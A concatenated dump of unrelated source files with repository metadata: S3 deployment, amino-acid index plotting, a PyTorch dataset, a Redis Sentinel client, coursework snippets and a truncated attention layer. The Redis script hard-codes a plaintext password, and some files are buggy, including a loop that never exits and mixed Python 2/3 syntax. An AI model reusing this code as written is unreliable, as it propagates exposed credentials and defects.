local('rm -rf %s/js_temp' % js_dir)
local('rm -rf %s/json_temp' % app_data_dir)
local('rm -rf %s/css_temp' % css_dir)
local('rm -rf %s/skin_temp' % skin_dir)
def s3_images():
'''Images only.'''
local(
'aws s3 sync %s/demolitions/static/images/ ' % PROJECT_DIR +
's3://projects.thelensnola.org/demolitions/images/ ' +
'--acl "public-read" '
'--cache-control "max-age=86400"')
def s3_static():
'''Static dir.'''
js_dir = '%s/demolitions/static/js' % PROJECT_DIR
css_dir = '%s/demolitions/static/css' % PROJECT_DIR
skin_dir = '%s/demolitions/static/default-skin' % PROJECT_DIR
app_data_dir = '%s/data/app' % PROJECT_DIR
# HTML
local(
'aws s3 sync %s/demolitions/static/html/html_temp/ ' % PROJECT_DIR +
's3://projects.thelensnola.org/demolitions/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--content-type "text/html; charset=UTF-8" ' +
'--cache-control "max-age=86400"')
# JS
local(
'aws s3 sync %s/js_temp/ ' % js_dir +
's3://projects.thelensnola.org/demolitions/js/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--cache-control "max-age=86400"')
# CSS
local(
'aws s3 sync %s/css_temp/ ' % css_dir +
's3://projects.thelensnola.org/demolitions/css/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--cache-control "max-age=86400"')
# PhotoSwipe
local(
'aws s3 sync %s/ ' % skin_dir +
's3://projects.thelensnola.org/demolitions/default-skin/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--cache-control "max-age=86400"')
local(
'aws s3 sync %s/skin_temp/ ' % skin_dir +
's3://projects.thelensnola.org/demolitions/default-skin/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--cache-control "max-age=86400"')
# Data
local(
'aws s3 sync %s/json_temp/ ' % app_data_dir +
's3://projects.thelensnola.org/demolitions/data/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--cache-control "max-age=86400"')
def s3():
    '''Push everything to S3.

    Full deploy pipeline: remove stale gzip temp dirs, minify and gzip the
    assets, upload the static files and images, then clean up again.
    '''
    clean_gzip()
    minify()
    gzip()
    s3_static()
    s3_images()
    # Second cleanup removes the *_temp directories created by gzip() above.
    clean_gzip()
| [
"thomasjthoren@gmail.com"
] | thomasjthoren@gmail.com |
6176d91067bf9468cfb74bf2abd4928f761a1d47 | b635e833bd8078b567551c9df97012860ef23c4a | /src/boxplots.py | ea095fd4766f7b3097f621015dbf0e455954c544 | [] | no_license | pebonte/AAindex | f94a58c8dc2dfff3d67e8a428f67c32e69571aa8 | 8aaed01f73f63dab49ae99a5f5a2a02fb0cf5729 | refs/heads/master | 2020-04-15T05:09:30.108528 | 2019-01-11T08:54:01 | 2019-01-11T08:54:01 | 164,410,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,778 | py | #! /usr/bin/env python3
import glob
from aaindex_processing import (retrieve_values_aaindex,
retrieve_loop_data,
make_dataframe_from_aaindex_data,
make_aaindex_boxplots_by_family)
'''
Script that create boxplots and produce data (.csv files) from alignments and aaindex values.
REQUIREMENT : Internet connection
'''
# One-letter codes of the 20 standard amino acids, in the order used by AAindex.
aa_list = 'ARNDCQEGHILKMFPSTWYV'
# list() replaces the original append loop; same contents, same order.
AMINO_ACID_LIST = list(aa_list)
if __name__ == '__main__':
    # Retrieve the alignment data; `remaining` lists files the pipeline skips.
    data = retrieve_loop_data('../data/alignment_plain/', '*.plain')
    alignment_data_dict, remaining = data
    # Report the files that won't be run (more than 6 cysteines).
    files_remaining_string = 'List of files with more than 6 cysteines : '
    for file_remaining in remaining:
        files_remaining_string += file_remaining + ', '
    print(files_remaining_string)
    # AAindex identifiers to retrieve.  BUG FIX: the original list contained
    # FAUJ880111 and TAKK010101 twice, so those indices were fetched and
    # plotted twice; the duplicates are removed here.
    list_aaindex_ids = ['BHAR880101', 'CASG920101', 'CHAM830107',
                        'CHOP780201', 'CHOP780202', 'CHOP780203',
                        'CIDH920105', 'DAYM780201', 'EISD860102',
                        'FASG760101', 'FAUJ880111', 'FAUJ880112',
                        'GOLD730101', 'GRAR740102',
                        'JANJ780101', 'JANJ780102', 'JANJ780103',
                        'JOND750101', 'JOND920102', 'KLEP840101',
                        'KRIW790101', 'KRIW790102', 'KYTJ820101',
                        'MITS020101', 'PONP930101', 'RACS820114',
                        'RADA880108', 'TAKK010101',
                        'VINM940101', 'WARP780101', 'WOLR790101',
                        'ZIMJ680101']
    #list_aaindex_ids = ['GRAR740102']
    # Retrieve the AAindex values (requires an Internet connection).
    aaindex_data = retrieve_values_aaindex(list_aaindex_ids)
    web_aaindex_data_dict, aaindex_names_data = aaindex_data
    # Group both data sources into one dataframe.
    df_data = make_dataframe_from_aaindex_data(web_aaindex_data_dict,
                                               aaindex_names_data,
                                               alignment_data_dict,
                                               list_aaindex_ids)
    data, dataframe, coding_family_name_dict, list_aaindex_ids = df_data
    # Boxplot and csv generation, one pass per family (sorted for stability).
    for family in sorted(alignment_data_dict['number_of_seq'].keys()):
        make_aaindex_boxplots_by_family(family,
                                        list_aaindex_ids,
                                        dataframe,
                                        coding_family_name_dict,
                                        alignment_data_dict,
                                        aaindex_names_data)
| [
"pierreemmanuel.bonte@gmail.com"
] | pierreemmanuel.bonte@gmail.com |
dec104f1556217e5f8b811392f81bac47904cebd | 1ffdf1e2a3a32bf617d9f11d27c9eac129161b19 | /Dataset_second.py | acea8db9cc5c0114d92e4286a7c0c9beceb1ec44 | [] | no_license | cjj1234/Document_layout_analysis | 8f7d27fc3a8d82d78c4cfd9abcd162fd5ee97e3a | a35231516bc17e047c670a0ba514a0bb02ac43d8 | refs/heads/master | 2021-01-08T20:03:43.582642 | 2020-02-16T09:50:16 | 2020-02-16T09:50:16 | 242,129,323 | 1 | 0 | null | 2020-02-21T12:01:06 | 2020-02-21T12:01:05 | null | UTF-8 | Python | false | false | 3,544 | py | import os
import cv2
import numpy as np
from augmentation import Augmentation
from torch.utils.data import Dataset
class ModelDataset(Dataset):
    """Segmentation dataset: RGB page images plus colour-coded region masks.

    Expects ``<base_path>/Image/*.jpg`` inputs and, in training mode,
    same-named ``<base_path>/Annotations/*.jpg`` masks (csv files are
    collected too but not parsed yet).
    """

    def __init__(self, base_path='./Data', train=True):
        super(ModelDataset, self).__init__()
        # Augmentation probabilities / target sizes.
        # TODO: move these into a config file.
        self.BLUR = 0.0
        self.FLIP = 0.0
        self.COLOR = 1.0
        self.GRAY = 0.2
        self.SIZE = (400, 600)
        self.MASK_SIZE = (38, 63)
        self.train = train
        # Augmentation pipeline (note: attribute name kept as in the API).
        self.augumentation = Augmentation(self.BLUR, self.FLIP, self.COLOR)
        # Directory layout.
        self.base_path = base_path
        self.image_path = os.path.join(base_path, 'Image')
        self.anno_path = os.path.join(base_path, 'Annotations')
        # Collect file names, sorted for a deterministic ordering.
        self.image_list = sorted(self.file_name(self.image_path, '.jpg'))
        if self.train:
            self.mask_list = sorted(self.file_name(self.anno_path, '.jpg'))
            self.csv_list = sorted(self.file_name(self.anno_path, '.csv'))
            # Drop every image that has no matching annotation
            # (iterate over a copy because the list is mutated).
            for name in self.image_list[:]:
                if name not in self.mask_list:
                    print("{} don't have annotation!".format(name))
                    self.image_list.remove(name)
        # Number of usable samples.
        self.num = len(self.image_list)

    def __getitem__(self, index):
        """Return a dict with a CHW float32 image and (in train mode) mask."""
        sample_mask = None
        name = self.image_list[index]
        sample_image = cv2.imread(os.path.join(self.image_path, name))
        if self.train:
            # TODO add csv reader
            sample_mask = cv2.imread(os.path.join(self.anno_path, name))
            # Convert to grayscale with probability self.GRAY.
            gray = self.GRAY and self.GRAY > np.random.random()
            sample_image, sample_mask = self.augumentation(sample_image,
                                                           sample_mask,
                                                           self.SIZE,
                                                           gray=gray)
            # Binarise the mask and prepend a "background" channel that is
            # set wherever no annotated class is present.
            sample_mask = cv2.resize(sample_mask, self.MASK_SIZE)
            sample_mask = np.where(sample_mask, 1, 0)
            blank = np.where(np.sum(sample_mask, axis=2) == 0, 1, 0)[:, :, np.newaxis]
            sample_mask = np.dstack((blank, sample_mask))
            sample_mask = sample_mask.transpose((2, 1, 0)).astype(np.float32)
        else:
            sample_image = cv2.resize(sample_image, self.SIZE)
        sample_image = sample_image.transpose((2, 1, 0)).astype(np.float32)
        return {
            'target_image': sample_image,
            'target_mask': sample_mask,
        }

    def __len__(self):
        return self.num

    def file_name(self, file_dir, target='.jpg'):
        """List the entries of *file_dir* whose extension equals *target*."""
        return [entry for entry in os.listdir(file_dir)
                if os.path.splitext(entry)[1] == target]
if __name__ == "__main__":
    import torch

    # Smoke test: build the training dataset and iterate once over it.
    train_set = ModelDataset(base_path='./Data', train=True)
    train_loader = torch.utils.data.DataLoader(dataset=train_set,
                                               batch_size=10,
                                               num_workers=1,
                                               shuffle=True)
    for batch in train_loader:
        print(batch)
| [
"jameslimers@gmail.com"
] | jameslimers@gmail.com |
5b9cb8a7ad424b8d939c86755a3ddeb0eb9efb65 | 209d360630262aaf2a8e600fe7efb6107fbba4f2 | /python-app-basic/connect2redis.py | b5cc60a8f4c7c407ef43e3def7e4e9823acac2d4 | [] | no_license | hemantdindi/redis-sentinel-docker-swarm | 1f1bdc9797b56a4f9f777d6ffb677cd714cdfea2 | bc7f5b9a5ebc9893223ead41770495b3c27e95f4 | refs/heads/master | 2022-10-21T20:21:10.736119 | 2020-06-13T12:46:53 | 2020-06-13T12:46:53 | 271,963,964 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | from redis.sentinel import Sentinel
import redis
#sentinel = Sentinel([('node01', 26379),('node02',26379),('node03',26379)],password='F9HaeCD6df24nLpn',socket_timeout=0.5)
# Ask the Sentinel service for the current master of the 'redis-cache' group.
# NOTE(review): the Sentinel and Redis passwords are hard-coded here; they
# should be moved into configuration / secrets management.
sentinel = Sentinel([('redis-sentinel', 26379)],password='7cBEcwf6mV36Rx3S',socket_timeout=0.5)
host, port = sentinel.discover_master('redis-cache')
print(host)
print(port)
# Smoke test: write one key through the discovered master and read it back.
redis_client = redis.StrictRedis(host=host,port=port,password='7cBEcwf6mV36Rx3S')
redis_client.set('key', 'value')
value=redis_client.get('key')
print(value)
| [
"hemantdindi@users.noreply.github.com"
] | hemantdindi@users.noreply.github.com |
5a28b6bebb2edcf6d7af16184dc4db6fd1d2ef8e | 66e9207731dad5cefcf54ddad80607c269409d7b | /csv_creation1/new/csv_format.py | ddde3fdedbe59f1bc3791478426ecdef48bc1c69 | [] | no_license | PawarKishori/Alignment1 | 2949df14734680264e0597c764086060e61ae704 | d824957037b7a0c585d9751485e485e3b9f20679 | refs/heads/master | 2020-05-24T16:36:22.745901 | 2020-01-21T07:41:03 | 2020-01-21T07:41:03 | 187,359,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,345 | py | import csv
import re
# Log file for any missing input file; opened in append mode so repeated
# runs accumulate their reports.
log=open('file_missing_log','a')
# One "missing" flag per input file; a flag is set to 1 when the matching
# open() below fails, and the corresponding section is skipped later.
flag=0
flag4=0
flag5=0
flag6=0
flag7=0
flag8=0
flag9=0
flagg=0
flag10=0
flag11=0
flag12=0
flag13=0
try:
    f=open("word.dat",'r').readlines()
    n=len(f)-1
except:
    flag=1
    # NOTE(review): the message names a different file than the one opened
    # ("word.dat"); presumably the file was renamed at some point -- confirm.
    log.write("E_id_word_dictionary.dat not found\n")
try:
    f4=open("parser_alignment.dat",'r').readlines()
except:
    flag4=1
    log.write("parser_alignment.dat not found\n")
try:
    f5=open("word_alignment_tmp.dat",'r').readlines()
except:
    flag5=1
    log.write("word_alignment_tmp.dat not found\n")
try:
    f6=open("word_alignment.dat",'r').readlines()
except:
    flag6=1
    log.write("word_alignment.dat not found\n")
try:
    f7=open("corrected_pth.dat",'r').readlines()
except:
    flag7=1
    log.write("corrected_pth.dat not found\n")
try:
    f8=open("corpus_specific_dic_facts_for_one_sent.dat",'r').readlines()
except:
    flag8=1
    log.write("corpus_specific_dic_facts_for_one_sent.dat not found\n")
try:
    f9=open("R_layer_final_facts.dat",'r').readlines()
except:
    flag9=1
    log.write("R_layer_final_facts.dat not found\n")
try:
    g=open("manual_lwg.dat",'r').readlines()
    glen=len(g)
except:
    flagg=1
    log.write("manual_lwg.dat not found\n")
try:
    f10=open("H_wordid-word_mapping.dat","r").readlines()
except:
    flag10=1
    log.write("H_wordid-word_mapping.dat not found\n")
try:
    f11=open("id_Apertium_output.dat", "r").readlines()
except:
    flag11=1
    log.write("id_Apertium_output.dat not found\n")
try:
    # vibhakti is read as one string: later code only does substring checks.
    f12=open("vibhakti", "r").read()
except:
    flag12=1
    log.write("vibhakti file not found\n")
try:
    f13=open("GNP_agmt_info.dat", "r").readlines()
except:
    flag13=1
    # BUG FIX: this branch previously called open("GNP_agmt_info.dat not
    # found"), which raised a fresh IOError inside the handler instead of
    # logging the missing file like every other branch.
    log.write("GNP_agmt_info.dat not found\n")
list_A=['A']
list_K=['K']
list_L=['L']
list_M=['M']
list_N=['N']
list_O=['O']
list_P=['P']
list_P1=['P1']
list_DICT=['DICT']
list_R=['R']
list_K_partial=['K_par']
for i in range(n):
list_A.append("_")
list_K.append("_")
list_L.append("_")
list_M.append("_")
list_N.append("_")
list_O.append("_")
list_P.append("_")
list_P1.append("_")
list_DICT.append("_")
list_R.append("_")
list_K_partial.append("_")
if(flag==0):
for i in range(1,n+1):
word=re.split(r'\s+',f[i-1].rstrip())
list_A[i]=word[1] #A_Layer
######## Displaying K layer and K layer partial . Added by Roja
m_dic = {}
k_dic = {}
k_par_dic = {}
##===================
def add_data_in_dic(dic, key, val):
    """Map *key* to *val* in *dic*; on a repeat key, append "/" + val."""
    if key in dic:
        dic[key] = dic[key] + '/' + val
    else:
        dic[key] = val
##===================
if(flag10==0):
for i in f10:
hword=re.split(r'\s+',i[:-2])
add_data_in_dic(m_dic, hword[2], hword[1])
##===================
def check_for_consecutive_ids(ids, id2):
    """Return a truthy result when *id2* directly follows an id in *ids*.

    *ids* is a single id ("4"), a space-joined run ("4 5"), or a
    '/'-separated list of alternatives ("4/7").  Returns True for a
    consecutive bare id, the string "True <run>" identifying the matching
    alternative otherwise, and None when id2 is not consecutive.
    """
    if '/' in ids:
        ids_lst = ids.split('/')
    elif ' ' in ids:
        # NOTE: splitting on '/' leaves a single element that still contains
        # spaces; the "' ' in each" branch below handles that element.
        ids_lst = ids.split('/')
    else:
        # Single bare id: either id2 follows it directly or it does not.
        # BUG FIX: previously a non-consecutive bare id fell through to the
        # loop below with ids_lst never assigned (UnboundLocalError).
        if int(ids) + 1 == int(id2):
            return True
        return None
    for each in ids_lst:
        if ' ' in each:
            ides = each.split()
            if int(id2) == int(ides[-1]) + 1:
                return 'True' + ' ' + ' '.join(ids_lst)
        else:
            if int(id2) == int(each) + 1:
                out = 'True' + ' ' + each
                return out
##===================
#print in k_dic
def store_data_in_k_dic(key, inp, val1, val2):
    """Record in the global ``k_dic`` that *key* maps to a consecutive run.

    *inp* is the result of check_for_consecutive_ids(): True, a string of
    the form "True <run>", or None when the ids were not consecutive.
    """
    if inp is None:
        # BUG FIX: a None result previously reached inp.split() below and
        # raised AttributeError; a non-consecutive pair now stores nothing.
        return
    if inp == True:
        k_dic[key] = val1 + ' ' + val2
    elif 'True' in inp.split():
        # Drop the leading "True" marker and extend the run with val2.
        k_dic[key] = ' '.join(inp.split()[1:]) + ' ' + val2
##===================
if(flag11==0):
for i in f11:
ap_out=re.split(r'\s+', i[:-2].strip())
mngs = []
try:
if(len(ap_out) > 2):
for each in ap_out[2:]:
k_mng = re.sub(r'[_-]', ' ', each) #parvawa_pafkwi
l = k_mng.split()
for item in l:
mngs.append(item)
for wrd in mngs:
wrd_id = int(ap_out[1]) #to get eng_wrd_id in id_Apertium_output
#print wrd, wrd_id, k_dic.keys()
if wrd_id not in k_dic.keys() and wrd in m_dic.keys():
k_dic[wrd_id] = str(m_dic[wrd])
# print '$$$', wrd, wrd_id, k_dic[wrd_id], m_dic[wrd]
elif wrd_id in k_dic.keys() and wrd in m_dic.keys():
if ' ' not in k_dic[wrd_id] and '/' not in str(m_dic[wrd]):
o = check_for_consecutive_ids(k_dic[wrd_id], m_dic[wrd])
store_data_in_k_dic(wrd_id, o, k_dic[wrd_id], str(m_dic[wrd]))
elif '/' not in str(m_dic[wrd]):
# print '^^', k_dic[wrd_id], m_dic[wrd], wrd
o = check_for_consecutive_ids(k_dic[wrd_id], m_dic[wrd])
store_data_in_k_dic(wrd_id, o, k_dic[wrd_id], str(m_dic[wrd]))
else:
# print k_dic[wrd_id], m_dic[wrd], wrd
if '/' not in k_dic[wrd_id]:
a = k_dic[wrd_id].split()
if str(int(a[-1])+1) in m_dic[wrd].split('/'):
o = check_for_consecutive_ids(k_dic[wrd_id], int(a[-1])+1)
store_data_in_k_dic(wrd_id, o, k_dic[wrd_id], str(int(a[-1])+1))
a = k_dic[wrd_id].split('/') #Ex: 2.9, sWAna se
for each in a:
if str(int(each)+1) in m_dic[wrd].split('/'):
o = check_for_consecutive_ids(each, int(each)+1)
store_data_in_k_dic(wrd_id, o, each, str(int(each)+1))
except:
# else:
log.write('Check this mng::,')
log.write(str(ap_out[2:]))
print('1111', ap_out[2:])
##===================
#Return key for a known value:
def return_key(val, dic):
    """Return the first key of *dic* whose value equals *val*, or contains
    it as one of its '/'-separated alternatives; None when nothing matches."""
    for key in dic:
        if val == dic[key]:
            return key
        elif val in dic[key].split('/'):
            return key

##===================
#return manual mngs:
def return_mng(ids, dic):
    """Map each id in *ids* back to its word via *dic*; space-join them.

    *ids* may be a '/'-separated string of ids or an iterable of id strings.
    BUG FIX: the original computed a '/'->' ' substitution it never used and
    then iterated over the raw string character by character, so
    '/'-separated inputs were never resolved id-by-id; they are now split
    properly (list inputs behave exactly as before).
    """
    parts = ids.split('/') if isinstance(ids, str) else ids
    mng = []
    for each in parts:
        m = return_key(each, dic)
        if m is not None:
            mng.append(m)
    return ' '.join(mng)
##===================
def check_for_vib(a_mng, m_mng, vib):
    """Return True when *m_mng* does not occur in the vibhakti text *vib*
    (substring test); otherwise fall through to None."""
    return True if m_mng not in vib else None
##===================
#To handle hE/hEM etc. using tam info. If this is part of tam then restricting them to display in partial layer.
tam_dic = {}
restricted_wrds = ['hE', 'hEM', 'WA', 'WIM', 'WI']
if(flag13==0):
for line in f13:
if line.startswith('(pada_info'):
t = re.split(r'\)', line.strip())
key = t[0].split()[-1]
tam_info = t[8].split('_')[-1]
if tam_info in restricted_wrds:
tam_dic[int(key)] = 'yes'
#print tam_dic.keys()
##===================
new_k_dic = {}
for i in f11:
ap_out=re.split(r'\s+', i[:-2].strip())
if(len(ap_out) > 2):
if int(ap_out[1]) in k_dic.keys():
ids = k_dic[int(ap_out[1])].split()
mngs = []
for each in ap_out[2:]:
k_mng = re.sub(r'_', ' ', each)
mngs.append(k_mng)
anu_mng = ' '.join(mngs)
man_mng = return_mng(ids, m_dic)
#print(anu_mng)
if anu_mng == man_mng:
new_k_dic[int(ap_out[1])] = ' '.join(ids)
print('Exact', anu_mng)
else:
out = check_for_vib(anu_mng, man_mng, f12)
if out == True:
if man_mng not in restricted_wrds:
print('partial', anu_mng, man_mng, ' '.join(ids), int(ap_out[1]))
k_par_dic[int(ap_out[1])] = ' '.join(ids)
elif man_mng in restricted_wrds and int(ap_out[1]) not in tam_dic.keys():
print man_mng, int(ap_out[1])
print('partial', anu_mng, man_mng, ' '.join(ids), int(ap_out[1]))
k_par_dic[int(ap_out[1])] = ' '.join(ids)
else:
k_par_dic[int(ap_out[1])] = '-'
##====================
#Store data in list_K
for i in range(1, n+1):
if i in new_k_dic.keys():
list_K[i] = new_k_dic[i]
else:
list_K[i] = '-'
##===================
#Store data in list_K_partial:
for i in range(1, n+1):
if i in k_par_dic.keys():
list_K_partial[i] = k_par_dic[i]
else:
list_K_partial[i] = '-'
##===================
print('Kth Layer info::\n', list_K)
print('Partial K layer info::\n', list_K_partial)
m_dic = {}
k_dic = {}
new_k_dic = {}
k_par_dic = {}
############# Added by Roja Ended
if(flag4==0):
n4=len(f4)
for i in range(n4):#N_Layer
f4[i]=f4[i].rstrip()[:-1]
f4[i]=f4[i][1:]
column=re.split(r'\)?\s\(',f4[i])
column[4]=column[4][:-1]
a_id=re.split(r'\s',column[1])
man_id=re.split(r'\s',column[2])
res=""
flagg=0
try:
g=open("manual_lwg.dat",'r').readlines()
except:
flagg=1
log.write("manual_lwg.dat not found")
glen=len(g)
for j in range(glen):
g[j]=g[j].rstrip()[:-1]
g[j]=g[j][1:]
new=re.split(r'\)?\s\(',g[j])
new[4]=new[4][:-1]
h_id=re.split(r'\s',new[1])
if man_id[1]==h_id[1]:
res=new[10]
break
res=res[:-1]
res=" ".join(res.split()[1:])
if res=="":
res=man_id[1]
log.write("Issue with parser_alignment.dat: man_id " + man_id[1]+" not found in manual_lwg.dat")
list_N[int(a_id[1])]=res
flagg=0
try:
g=open("manual_lwg.dat",'r').readlines()
glen=len(g)
except:
flagg=1
log.write("manual_lwg.dat not found")
if(flag5==0):
n5=len(f5)
for i in range(n5): #O_Layer
res=re.split(r'\s+',f5[i].rstrip())
number1=res[4][:-1] #Man_ID
number2=res[2][:-1] #ANu_ID
temp=0
for j in range(glen):
res1=re.split(r'\s+',g[j].rstrip())
number3=res1[2][:-1]
#print(number3)
if(int(number1)==int(number3)):
temp=1
str1=[]
m=len(res1)
for k in range(1,m):
k=k*-1
if(res1[k]=='(group_ids'):
break
else:
y=k*-1
if(y==1):
res1[k]=res1[k][:-2]
str1.append(res1[k])
str1.reverse()
lenstr=len(str1)
a=""
for m in range(lenstr):
a=a+str1[m]+" "
#print(a)
for l in range(n+1):
if(int(l)==int(number2)):
a=a[:-1]
list_O[l]=a
#print(list_O[l])
if(temp==0):
for l in range(n+1):
if(int(l)==int(number2)):
list_O[l]=number1
print(list_O)
if(flag6==0):#P_Layer
n6=len(f6)
for i in range(n6):
res1=f6[i][1:]
res2=res1[:-2]
res3=re.split(r'-',res2)
length=len(res3)
anu_id=re.split(r'\s+',res3[4])[1]
str1=""
str2=""
if(length>6):
for j in range(5,length):
if(res3[j]!=' '):
str1=str1+res3[j]+"-"
str2=str1[:-1]
elif(length==6):
str2=res3[5]
str3=str2[1:]
myre=re.split(r'\s+',str3)
try:
myre.remove("-")
except:
print(" ")
abc=len(myre)
print(myre)
print(abc)
str5=""
for k in range(1,abc):
str5=str5+myre[k]+" "
man_id=myre[0]
str4=str5[:-1]
print(str4)
for j in range(glen):
res11=g[j][:-3]
res12=res11[1:]
res13=re.split(r'\)?\s\(',res12)
res14=re.split(r'\s',res13[1])[-1]
res15=res13[-1]
res16=re.split(r'\s+',res15)
length1=len(res16)
str10=""
for k in range(1,length1):
str10=str10+res16[k]+" "
if(res14==man_id):
if('@PUNCT-OpenParen@PUNCT-OpenParen'in str4 and abc==2):
print("")
else:
for k in range(1,n+1):
if(int(anu_id)==int(k)):
list_P[k]=str10[:-1]
flagg=0
try:
g=open("manual_lwg.dat",'r').readlines()
glen=len(g)
except:
flagg=1
log.write("manual_lwg.dat not found")
if(flag7==0):
n7=len(f7)
for i in range(n7): #P1_Layer
res=f7[i][:-3]
res1=res[1:]
res2=re.split(r'\)?\s+\(',res1)
res3=res2[-1]#for Group_ID
res4=res2[1]# for Anu_ID
res5=re.split('\s+',res3)
res6=re.split('\s+',res4)[1]
#print(res6)
#print(res5[1])
m1=len(res5)
m2=len(res6)
str1=""
for j in range(m1):
if(j!=0):
str1=str1+res5[j]+" "
#print(str1)
for k in range(n+1):
if(int(k)==int(res6)):
str1=str1[:-1]
list_P1[k]=str1
print(list_P1)
if(flag8==0):
n8=len(f8)
for i in range(n8):#DICT Layer
res=f8[i][1:]
res1=res[:-3]
res2=re.split(r'\)?\s\(',res1)
id1=re.split('\s+',res2[3]) #H_id
id2=re.split('\s+',res2[1]) #E_id
print(id1)
m1=len(id1)
m2=len(id2)
str1=""
for j in range(m1):
if(j!=0):
str1=str1+id1[j]+" "
number=id2[-1]
for k in range(n):
#print("1")
if(int(k)==int(number)):
str1=str1[:-1]
list_DICT[k]=str1
print(list_DICT)
if(flag9==0):
n9=len(f9)
for i in range(n9):#R Layer
res=f9[i][1:]
res1=res[:-3]
res2=re.split(r'\)?\s\(',res1)
id1=re.split('\s+',res2[3]) #H_id
id2=re.split('\s+',res2[1]) #E_id
print(id1)
m1=len(id1)
m2=len(id2)
str1=""
for j in range(m1):
if(j!=0):
str1=str1+id1[j]+" "
number=id2[-1]
for k in range(n):
#print("1")
if(int(k)==int(number)):
str1=str1[:-1]
list_R[k]=str1
print(list_R)
log.close()
with open("H_alignment_parserid.csv", 'w') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow(list_A)
csvwriter.writerow(list_K)
csvwriter.writerow(list_K_partial)
csvwriter.writerow(list_L)
csvwriter.writerow(list_M)
csvwriter.writerow(list_N)
csvwriter.writerow(list_O)
csvwriter.writerow(list_P)
csvwriter.writerow(list_P1)
csvwriter.writerow(list_DICT)
csvwriter.writerow(list_R)
| [
"saumya@anu"
] | saumya@anu |
6a589c3f2246fe20b2c1aa3620a55f667b64a3d0 | 6d57d900dd04fbc8bc06da1570b91bf110d2b46a | /coins.py | b5c9765e9cd35e410a720eac2bc19e54b2849753 | [] | no_license | seilcho7/week_1-python | 3644d25bc3921ad6e5a545e991df5edef3811030 | 71f620c00d09a975c3f5a3f53a56327b30ed64ea | refs/heads/master | 2020-04-24T00:37:09.136987 | 2019-02-20T00:15:25 | 2019-02-20T00:15:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | coins = 0
no_stop = True
while no_stop:
print("You have %d coins." % (coins))
ask_coins = input("Do you want another? ")
if ask_coins == "yes":
coins = coins + 1
elif ask_coins =="no":
print("Bye")
stop = False
| [
"seilcho7@hotmail.com"
] | seilcho7@hotmail.com |
df2805ded0f8ca965205b075e6a84753cff47e12 | b2fb3c44c67eb61c41465996c24c094071c457cc | /LeetCode/print_words_vertically.py | 3027e23f1272d85cbab87a94fe941c5d21586733 | [] | no_license | zelzhan/Challenges-and-contests | 8edd3a2f07a0538903dc885c86e15f02783821c5 | e7df9b37ad1130d37f3efbf0114d06b6f3b4a4f1 | refs/heads/master | 2022-12-28T23:16:30.807040 | 2020-10-13T10:09:22 | 2020-10-13T10:09:22 | 118,697,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | from collections import defaultdict
class Solution:
def printVertically(self, s: str) -> List[str]:
s = s.split(" ")
hashtable = defaultdict(int)
for i, string in enumerate(s):
hashtable[i] = len(string)
max_length = max(hashtable.values())
j = 0
res = []
def pop_zeroes(cont):
i = -1
while cont[i] == " ":
cont.pop()
while j != max_length:
word = []
for i, string in enumerate(s):
if hashtable[i] == 0:
word.append(" ")
else:
hashtable[i] -=1
word.append(string[j])
j+=1
pop_zeroes(word)
res.append("".join(word))
return res
| [
"noreply@github.com"
] | noreply@github.com |
7e1eb1cb818f46327bce95c194898ef7c0b8d4ae | adfc039a4fa6550068b659db2169995b23b88ffa | /staticJsonRead1.py | cd860a781fa914d006a1fe290d4facff538ebb71 | [] | no_license | nitinawathare/EVDExperimentSetup | b1928bc4a740618503830cff153c6853e802a41f | cd7289ba75a5bdc25c46d89203ed7bb314ac3b50 | refs/heads/master | 2022-05-12T18:26:08.991695 | 2019-11-14T07:40:30 | 2019-11-14T07:40:30 | 186,911,557 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | import json, ast
from pprint import pprint
with open('/home/ubuntu/gitRepoEVD/.ethereum1/static-nodes.json') as fopen:
data = json.load(fopen)
print(data[0])
| [
"nitinawathare14@gmail.com"
] | nitinawathare14@gmail.com |
77c7c60572f8a72ca13834fc8673b3b32542bf3a | 1347c41e3957ce7c9c1d10b25f0fd20a3e450b36 | /labs/ex03/template/costs.py | 14a3696f00ecc9c86c42a022aaa204b6b578ff7d | [] | no_license | hmoreau94/ML_course | a8f93e95c2ba0234a5ed5825c4e45038b548ada8 | ced2268f571f8f1481a9353902b20f54f311aaa7 | refs/heads/master | 2021-01-11T06:21:03.044575 | 2016-10-12T13:38:07 | 2016-10-12T13:38:07 | 70,158,204 | 0 | 0 | null | 2016-10-06T13:47:43 | 2016-10-06T13:47:41 | Jupyter Notebook | UTF-8 | Python | false | false | 494 | py | # -*- coding: utf-8 -*-
"""a function used to compute the cost."""
import numpy as np
def compute_cost_mae(y, tx, w):
"""calculate the cost.
you can calculate the cost by mae.
"""
e = np.absolute(y - np.dot(tx,w))
toReturn = (np.sum(e) / y.shape[0])
return toReturn
def compute_cost_mse(y, tx, w):
"""calculate the cost.
you can calculate the cost by mse.
"""
e = y - np.dot(tx,w)
toReturn = (np.dot(e.T, e) / (2*y.shape[0]))
return toReturn | [
"moreauhugo@me.com"
] | moreauhugo@me.com |
a412224fa7b20001afa3b1a7ae02d7fa57aef086 | 64cd387bd26410d072571d579ff3791e8729e8ef | /modeling/attention.py | 71d12c40f14544d8f03e214d51fa04b65bd512bb | [
"Apache-2.0"
] | permissive | xdeng7/scale-aware_da | 41f064022f61a47bb31c20b511886318803765ac | c69066524b4d234441081d587d0afc45fa2f585d | refs/heads/main | 2023-03-11T19:24:29.304387 | 2021-03-04T01:53:43 | 2021-03-04T01:53:43 | 311,015,579 | 18 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,059 | py | from torch import nn
import torch
class CALayer(nn.Module):
def __init__(self, channel, reduction=16):
super(CALayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
